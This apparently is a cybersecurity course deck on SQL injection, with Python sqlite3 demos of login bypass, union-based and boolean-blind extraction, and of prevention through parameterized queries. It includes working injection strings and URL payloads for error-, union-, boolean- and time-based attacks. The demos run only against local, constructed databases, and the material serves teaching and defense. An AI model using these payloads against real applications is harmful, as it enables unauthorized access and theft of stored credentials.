(** Cyber Security Course: https://www.edureka.co/cybersecurity-certification-training **)
This 'SQL Injection Attack' PPT by Edureka will help you learn one of the most dangerous web application vulnerabilities: SQL Injection.
Below is the list of topics covered in this session:

Web Application Security
What is SQL Injection Attack?
Types of SQL Injection attacks
Demo - SQL Injection Attack Types
Prevention of SQL Injection Attack

Cyber Security Playlist: https://bit.ly/2N2jlNN
Cyber Security Blog Series: https://bit.ly/2AuULkP
Cybersecurity Certification Training www.edureka.co/cybersecurity-certification-training
Agenda
01 What is Application Security?
02 What is SQL Injection Attack?
03 Types of SQL Injection Attacks
04 Demo - SQL Injection Attack types
05 Prevention of SQL Injection attack
Application Security Copyright © 2019, edureka and/or its affiliates. All rights reserved.
Cybersecurity
Cyber security refers to the body of technologies, processes, and practices designed to protect networks, devices, programs, and data from attack, damage, or unauthorized access. Its main areas are: Application Security, Network Security, Information Security, Operational Security, Disaster Recovery, and End-user Education.
Application Security
Application security is the use of software, hardware, and procedural methods to protect applications from external threats.

Web Application Vulnerabilities (percentage by class)
Cross Site Scripting         46.97%
SQL Injection                18.01%
File Upload                   9.69%
Cross Site Request Forgery    8.63%
Local File Inclusion          4.57%
Remote Code Execution         2.75%
Full Path Disclosure          2.44%
Remote File Inclusion         2.19%
Authentication Bypass         2.19%
General Bypass                1.69%
Open Redirect                 0.63%
XML External Entity           0.19%
Denial of Service             0.06%
What is SQL Injection?
In the early days of the internet, building websites was pretty straightforward. Then the need for more advanced technology and dynamic websites grew, and a typical stack became:
Front End: HTML, CSS, JavaScript
Back End: .NET, PHP, Ruby, Python
Database: MySQL, Oracle, MongoDB
What is SQL Injection?
A SQL query is one way an application interacts with its database.
A SQL Injection occurs when an application builds a query by concatenating user input into the SQL text without parameterizing or escaping it, so the input is interpreted as SQL rather than as data.
An attacker can then use specially crafted SQL fragments to read or modify the web application's database, and in some configurations to control the database server itself.
SQL Injection Attack - Non Technical Explanation
Form template: Drive through <route> and <where should the bus stop?> if <when should the bus stop?>.
Sample populated form: Drive through route77 and stop at the bus stop if there are people at the bus stop.
Injected form: Drive through route77 and do not stop at the bus stop and ignore the rest of the form. if there are people at the bus stop
The driver follows the instruction smuggled into the field and never applies the rest of the form, just as a SQL comment discards the rest of a query.
SQL Injection Attack - Technical Explanation
Sample SQL statement (the application concatenates user input straight into the query string):
$statement = "SELECT * FROM users WHERE username = '$user' AND password = '$password'";
With normal input:
$statement = "SELECT * FROM users WHERE username = 'Dean' AND password = 'WinchesterS'";
Sample SQL Injection, with the username field set to Dean' OR '1'='1' -- :
$statement = "SELECT * FROM users WHERE username = 'Dean' OR '1'='1' -- ' AND password = 'WinchesterS'";
'1'='1' is a condition that is always true, so the WHERE clause matches regardless of the password and the application accepts the login. The -- instructs the SQL parser that the rest of the line is a comment and should not be executed, which discards the password check entirely. (In MySQL the -- must be followed by a space.)
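The login query above, run end to end as an added example (not code from the original slides). Python's built-in sqlite3 stands in for the PHP/MySQL stack of the slide, the users table and its two rows are constructed for the demo, and the hardened version shows the same check with a parameterized query:

```python
import sqlite3

# Constructed sample data for the demo (not from the original slides).
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('Dean', 'WinchesterS'), ('Sam', 'hunter2')")
conn.commit()


def build_vulnerable_query(user, password):
    # String concatenation, as on the slide: attacker text becomes part of the SQL.
    return (
        f"SELECT username FROM users WHERE username = '{user}' "
        f"AND password = '{password}'"
    )


def login_vulnerable(user, password):
    """Returns the matched username, or None. Vulnerable to injection."""
    row = conn.execute(build_vulnerable_query(user, password)).fetchone()
    return row[0] if row else None


def login_safe(user, password):
    """Same check using a parameterized query: input is bound as data, never parsed as SQL."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (user, password),
    ).fetchone()
    return row[0] if row else None


# The slide's payload: closes the string literal, adds an always-true OR,
# and comments out the password check.
PAYLOAD = "Dean' OR '1'='1' -- "

if __name__ == "__main__":
    print(build_vulnerable_query(PAYLOAD, "wrong"))
    print(login_vulnerable(PAYLOAD, "wrong"))  # logged in as Dean without the password
    print(login_safe(PAYLOAD, "wrong"))        # None: no user has that literal username
```

With the parameterized version the quote and the `--` are just characters inside the bound value, so the database looks for a user literally named `Dean' OR '1'='1' -- ` and finds nothing.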
Impact of SQL Injection Attack
Delete data and drop tables
Extract sensitive information
Misuse authentication details (bypass logins, impersonate users)
Types of SQL Injection
Categories of SQL Injection
SQL Injection
  In-Band SQLi
    Union-based
    Error-based
  Blind SQLi
    Boolean-based
    Time-based
  Out-of-band SQLi
Types of SQL Injection
Error-based (in-band): force a database error whose message leaks data, here the MySQL version through a duplicate-key error:
https://example.com/index.php?id=1 AND(SELECT 1 FROM(SELECT COUNT(*),concat(version(),FLOOR(rand(0)*2))x FROM information_schema.TABLES GROUP BY x)a)--+
Union-based (in-band): append a SELECT with the same number of columns as the original query so its result is rendered in the page:
https://example.com/index.php?id=1 UNION SELECT @@version--+
Boolean-based (blind): nothing is echoed back; the attacker asks a true/false question and watches whether the page content changes:
https://example.com/index.php?id=1+AND+IF(version()+LIKE+'5%',true,false)
Time-based (blind): the same question, but the answer is read from the response delay:
https://example.com/index.php?id=1+AND+IF(version()+LIKE+'5%',sleep(3),false)
Out-of-band: the result leaves over a separate channel (for example a DNS or HTTP request made by the database server) instead of the HTTP response.
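Union-based and boolean-based injection, as an added example that is not part of the original slides. It uses Python's sqlite3 with a constructed products table and a constructed users row in place of the slide's MySQL target; the vulnerable endpoint concatenates a numeric id unquoted. Time-based injection is not shown because SQLite has no sleep() function, but it follows the same oracle pattern with the delay as the signal:

```python
import sqlite3

# Constructed sample schema and data for the demo (not from the original slides).
conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE products (id INTEGER, name TEXT);
INSERT INTO products VALUES (1, 'Laptop'), (2, 'Phone');
CREATE TABLE users (username TEXT, password TEXT);
INSERT INTO users VALUES ('admin', 'S3cr3t!');
""")


def lookup_vulnerable(product_id):
    """Vulnerable endpoint: the id is concatenated unquoted into the query.
    Returns the list of product names, i.e. what the page would render."""
    sql = f"SELECT name FROM products WHERE id = {product_id}"
    return [row[0] for row in conn.execute(sql)]


def union_based():
    # In-band, union-based: id=0 matches no product, and the appended SELECT has the
    # same column count (one), so the stolen row is rendered where a name would be.
    return lookup_vulnerable("0 UNION SELECT username || ':' || password FROM users")


def boolean_blind_extract(max_len=32):
    """Blind, boolean-based: only 'real product shown / not shown' is observable.
    Recovers the admin password one character at a time by binary search."""
    def oracle(condition):
        # True when the injected condition holds (the genuine product row comes back).
        return lookup_vulnerable(f"1 AND ({condition})") == ["Laptop"]

    secret = "(SELECT password FROM users WHERE username = 'admin')"
    recovered = ""
    for pos in range(1, max_len + 1):
        if not oracle(f"length({secret}) >= {pos}"):
            break  # no more characters to recover
        probe = f"unicode(substr({secret}, {pos}, 1))"
        lo, hi = 32, 126  # printable ASCII range
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(f"{probe} > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        recovered += chr(lo)
    return recovered


if __name__ == "__main__":
    print(union_based())          # ['admin:S3cr3t!'] in one request
    print(boolean_blind_extract())  # 'S3cr3t!' after ~7 requests per character
```

The union variant leaks the whole row in a single response; the blind variant needs roughly log2(95) requests per character, which is why blind injection is slower but works even when the application shows no query output at all.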
Demo - Types of SQL Injection
Preventing SQL Injection
Performing static and dynamic testing
Using parameterized queries (prepared statements) and ORMs: the primary defense, since input is bound as data and never parsed as SQL
Using escape characters in SQL queries: only as a fallback where a value cannot be parameterized, and only protective inside quoted string literals
Enforcing least privilege on the database account, so an injected query cannot read, change or drop more than the application itself needs
Enabling web-application firewalls as an extra detection layer, not as a substitute for fixing the code
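Why escaping is listed only as a fallback, shown as an added example (not from the original slides). Using Python's sqlite3 with a constructed products table, the same quote-doubling escape that neutralizes an injection inside a quoted string literal does nothing for an unquoted numeric parameter, while a bound parameter is safe in both contexts:

```python
import sqlite3

# Constructed sample data for the demo (not from the original slides).
conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE products (id INTEGER, name TEXT, public INTEGER);
INSERT INTO products VALUES (1, 'Laptop', 1), (2, 'Internal prototype', 0);
""")


def escape_quotes(value):
    # Escaping: double every single quote so the string literal cannot be closed early.
    return str(value).replace("'", "''")


def by_name_escaped(name):
    # Escaping works here because the input lands inside a quoted string literal.
    sql = f"SELECT name FROM products WHERE public = 1 AND name = '{escape_quotes(name)}'"
    return [r[0] for r in conn.execute(sql)]


def by_id_escaped(product_id):
    # Escaping fails here: the input is unquoted, so the attacker needs no quote at all
    # and "1 OR 1=1" passes through untouched.
    sql = f"SELECT name FROM products WHERE public = 1 AND id = {escape_quotes(product_id)}"
    return [r[0] for r in conn.execute(sql)]


def by_id_parameterized(product_id):
    # A bound parameter is always a single value; the driver never parses it as SQL.
    return [r[0] for r in conn.execute(
        "SELECT name FROM products WHERE public = 1 AND id = ?", (product_id,))]


if __name__ == "__main__":
    print(by_name_escaped("Laptop' OR '1'='1"))   # [] - escaped, injection defeated
    print(by_id_escaped("1 OR 1=1"))              # ['Laptop', 'Internal prototype'] - leaks the private row
    print(by_id_parameterized("1 OR 1=1"))        # [] - bound as data, no match
```

The numeric case also shows why a WAF is only a second layer: the payload contains no quote, comment marker or keyword a naive filter would flag, yet `public = 1 AND id = 1 OR 1=1` returns every row because AND binds tighter than OR.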
Exploiting SQL Vulnerability in Application